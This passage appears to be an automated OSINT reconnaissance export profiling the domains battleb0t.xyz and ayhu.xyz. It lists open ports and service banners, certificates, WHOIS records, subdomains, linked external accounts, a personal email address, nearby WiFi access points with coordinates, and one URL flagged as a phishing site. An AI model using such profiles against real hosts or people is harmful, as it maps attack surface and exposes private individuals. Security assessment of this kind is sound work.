"485454502f312e312034303320466f7262696464656e0d0a5365727665723a206e67696e780d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a566172793a204163636570742d456e636f64696e670d0a455461673a20572f2236343231376463352d313536220d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_NTT", "banner": "HTTP/1.1 403 Forbidden\r\nServer: nginx\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nVary: Accept-Encoding\r\nETag: W/\"64217dc5-156\"\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "source": 
"OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:*:*:*:*:*:*:*:*", "other": {"family": "nginx"}}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676", "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b", "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"], "chain": [{"issuer_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "fingerprint": "7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "fingerprint": "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "fingerprint": "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"}], "leaf_data": {"pubkey_algorithm": "RSA", "public_key": {"key_algorithm": "RSA", "rsa": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 256, "modulus": "0TpnPayT/qE4F6J4qzOiK7JhnrAo9bFLNo2svrHA/v0LaIOAybJrnc5AyyYwgS6PTnc5WMsgwlVeIH5TInjmeEsEinXaSlGOrsV7Gm/ZW+7PMzYrK4KMP7g5Pv95Q5JU7FTQvxHAzRGxkvPDzcyogoNJIk1KXgVLPxdUyd+B1UFVrTMrqAkIf0M1HRzdWlOHv+OEsQ2QjcnXP0mIdDF6sbDns9klIt09P59g0zL++OZSIkvbIRKyvkKcmp+73HQRF0pjn2SY2RJKMExBzgIlPDKzcHLqDMPRl2zP8TcIdzRjF/X4rRYa64yxqmMYIDs4WPnhkpo7c5uTK7f4TFIU1Q==", 
"exponent": "AAEAAQ=="}, "fingerprint": "e577b60ecc733cd981273f877b2ab03d93986490630d699801165ebbec0a48cf"}, "subject_dn": "CN=*.cloudwaysapps.com", "pubkey_bit_size": 2048, "fingerprint": "46c14572bed6bb1c8797e7a0292d295e561d717b22535af514608f0d2fe40802", "issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "names": ["*.cloudwaysapps.com", "cloudwaysapps.com"], "tbs_fingerprint": "f9537ad843dfc5f6c9ec168dd4c17c3b |
| 2023-05-12 03:15:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Snapchat Stories (Category: social)
https://story.snapchat.com/s/Battleb0t | Battleb0t |
| 2023-05-12 02:54:30 | Open TCP Port Banner | No | Censys | 0 | 1 | 3 | 0 | None | SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2 | 64.226.81.43 |
| 2023-05-12 03:01:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.108): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:03:33 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00arthur00.github.io |
| 2023-05-12 02:52:38 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://t.length/32));return', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://docs.google.com/forms/d/e/1faipqlser-pujhmdg5fmasxykmvy3egptc-yai4up5by6hx5g_9wzaw/viewform', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://multi-trustpad.so/plutusdao/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_ac8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_ac8_IE_EarlyTabStart_0xbe8_Mutex"\n "IsoScope_ac8_IESQMMUTEX_0_519"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_ac8_IESQMMUTEX_0_303"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2760"\n "IsoScope_ac8_ConnHashTable<2760>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_ac8_IESQMMUTEX_0_331"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2760"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts 
| 185.199.108.153 |
| 2023-05-12 03:03:32 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 007joshie.github.io |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | bux180 (Net ID: 00:07:7D:16:27:67) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:01:27 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.3): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | referrer-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=ZnKgqHhkfhEMG0RRLEy55qXrIGT89PCJPvhlAxU1THPzwDrL5gc7PkT%2B%2FxSKq2nR5SYE1oIsFspz8pOEUKsQOZN%2FSfuF%2FMxnliSNjDjXg8QSfRLZrnIM0lr2QA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f603759cec44a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:45:46 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 2 | 0 | None | {u'city': u'Chantilly', u'security': {u'is_vpn': False}, u'city_geoname_id': 4751935, u'region_geoname_id': 6254928, u'country': u'United States', u'region': u'Virginia', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'FASTLY', u'isp_name': u'American Registry Internet Numbers', u'organization_name': u'American Registry Internet Numbers', u'autonomous_system_number': 54113}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'20151', u'longitude': -97.822, u'country_code': u'US', u'timezone': {u'abbreviation': u'CDT', u'gmt_offset': -5, u'is_dst': True, u'name': u'America/Chicago', u'current_time': u'21:45:45'}, u'latitude': 37.751, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'2606:50c0:8003::153', u'continent': u'North America', u'region_iso_code': u'VA'} | 2606:50c0:8003::153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 2 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=WwRFDMWv1i%2FLL8I%2BSQXrEl8P6VG5M1GGitMkpd4FkAGmtOdqQDCLc17nGzjDcmqZpet%2BvxBX8CUcOAv3alTgafYDwFhVZzoAKiiOmj1uFX8dLMhZ1ZA2lQdL%2FA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60363a5a178c-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:03:22 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0-ye.github.io |
| 2023-05-12 02:55:01 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 151
Connection: keep-alive
CF-RAY: 7c5c61b40afd1911-FRA
| 188.114.96.1 |
| 2023-05-12 03:08:45 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.214 | 104.196.30.220 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | myLGNet (Net ID: 00:01:36:26:95:98) | 50.1188, 8.6843 |
| 2023-05-12 03:01:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.184): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:22 | Linked URL - Internal | No | Web Spider | 2 | 0 | 2 | 0 | None | https://www.ayhu.xyz/ | www.ayhu.xyz |
| 2023-05-12 02:54:22 | Web Content Type | No | Web Spider | 0 | 0 | 2 | 0 | None | text/html | http://kekw.battleb0t.xyz/jar |
| 2023-05-12 03:08:48 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.229 | 104.196.30.220 |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | +OK Dovecot ready.
| 87.248.157.102 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | PM Guest (Net ID: 00:1C:10:F9:53:B8) | 32.8608, -79.9746 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Gravatar (Category: images)
http://en.gravatar.com/profiles/ayhu | ayhu |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | myLG86 (Net ID: 00:01:36:37:73:C0) | 34.0544, -118.244 |
| 2023-05-12 02:46:28 | Raw Data from RIRs | No | Hybrid Analysis | 3 | 0 | 2 | 0 | None | | 185.199.111.153 |
| 2023-05-12 02:59:44 | Co-Hosted Site - Domain Whois | No | Whois | 3 | 0 | 3 | 0 | None | Domain Name: CLOUDWAYSAPPS.COM
Registry Domain ID: 1695307151_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2022-09-12T18:44:13Z
Creation Date: 2012-01-04T12:17:34Z
Registry Expiry Date: 2028-01-04T12:17:34Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: NS-1086.AWSDNS-07.ORG
Name Server: NS-2016.AWSDNS-60.CO.UK
Name Server: NS-222.AWSDNS-27.COM
Name Server: NS-854.AWSDNS-42.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain name: cloudwaysapps.com
Registry Domain ID: 1695307151_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2022-06-22T11:27:03.11Z
Creation Date: 2012-01-04T12:17:34.00Z
Registrar Registration Expiration Date: 2028-01-04T12:17:34.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: 28efa154c841448e9e98cc948672b2d4.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: 28efa154c841448e9e98cc948672b2d4.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: 28efa154c841448e9e98cc948672b2d4.protect@withheldforprivacy.com
Name Server: ns-222.awsdns-27.com
Name Server: ns-854.awsdns-42.net
Name Server: ns-1086.awsdns-07.org
Name Server: ns-2016.awsdns-60.co.uk
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T06:41:09.59Z <<<
For more information on Whois status codes, please visit https://icann.org/epp | cloudwaysapps.com |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BurkonAlt (Net ID: 00:18:4D:35:AF:23) | 40.2024, 29.0398 |
| 2023-05-12 03:03:17 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | cpcalendars.ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:89:7c:23:d8:89:20:d1:c5:b3:ae:30:91:44:3a:23:81:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 14 03:53:54 2022 GMT
Not After : Mar 14 03:53:53 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3D:15:56:A1:3D:00:5C:E7:21:10:87:5C:48:60:81:D6:19:B0:97:7A
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:cpanel.ayhu.xyz, DNS:cpcalendars.ayhu.xyz, DNS:cpcontacts.ayhu.xyz, DNS:mail.ayhu.xyz, DNS:webdisk.ayhu.xyz, DNS:webmail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 03:24:29 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 7 | 0 | None | GoDaddy.com, LLC | Domain Name: CLIENTIFY.NET
Registry Domain ID: 1866957767_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2022-09-16T17:34:41Z
Creation Date: 2014-07-15T10:59:40Z
Registry Expiry Date: 2023-07-15T10:59:40Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: 480-624-2505
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Name Server: JANET.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Domain Name: CLIENTIFY.NET
Registry Domain ID: 1866957767_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-07-16T08:59:21Z
Creation Date: 2014-07-15T05:59:40Z
Registrar Registration Expiration Date: 2023-07-15T05:59:40Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: Not Available From Registry
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=CLIENTIFY.NET
Registry Admin ID: Not Available From Registry
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=CLIENTIFY.NET
Registry Tech ID: Not Available From Registry
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=CLIENTIFY.NET
Name Server: JANET.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:14Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 03:00:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.17): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:44:31 | Internet Name | No | DNS Resolver | 19 | 0 | 2 | 0 | None | vscode.battleb0t.xyz | (raw Certificate Transparency dump for battleb0t.xyz omitted) |
| 2023-05-12 03:03:35 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00jew.github.io |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | no_ssid (Net ID: 00:00:74:79:C8:F8) | 41.8781, -87.6298 |
| 2023-05-12 02:54:20 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
67:78:0f:c0:b3:05:0b:42:0e:1c:78:58:8a:88:56:0d
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
Validity
Not Before: Nov 17 08:19:18 2022 GMT
Not After : Feb 15 08:19:17 2023 GMT
Subject: CN=*.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
61:B8:A8:F3:B0:F5:FF:35:6D:A7:1D:C8:69:9E:4B:49:3E:DA:20:38
X509v3 Authority Key Identifier:
keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8
Authority Information Access:
OCSP - URI:http://ocsp.pki.goog/s/gts1p5/_haK7tXOc_M
CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.11129.2.5.3
X509v3 CRL Distribution Points:
Full Name:
URI:http://crls.pki.goog/gts1p5/QAbdIRPj4FY.crl
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
| battleb0t.xyz |
| 2023-05-12 03:01:49 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.110.153:443 | 185.199.110.0/24 |
| 2023-05-12 02:56:54 | IPv6 Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 2606:4700:3031::6815:6a6 | www.ayhu.xyz |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | 1001mem (Category: social)
http://1001mem.ru/login | login |
| 2023-05-12 02:59:49 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 2 | 0 | None | bradsdevemail@gmail.com | (raw browser-extension metadata dump omitted) |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | FriendFinder-X (Category: dating)
https://www.friendfinder-x.com/profile/login | login |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | default (Net ID: 00:08:5C:63:7B:B5) | 40.2024, 29.0398 |
| 2023-05-12 02:50:19 | Physical Location | No | ipstack | 0 | 0 | 3 | 0 | None | United States | 35.229.48.116 |
| 2023-05-12 02:46:33 | Netblock Membership | No | RIPE | 1 | 0 | 3 | 0 | None | 104.196.16.0/20 | 104.196.30.220 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Marshside Village (Net ID: 00:0F:CC:E2:DF:E8) | 32.8608, -79.9746 |
| 2023-05-12 02:55:15 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 165.232.113.85:22 | 165.232.113.85 |
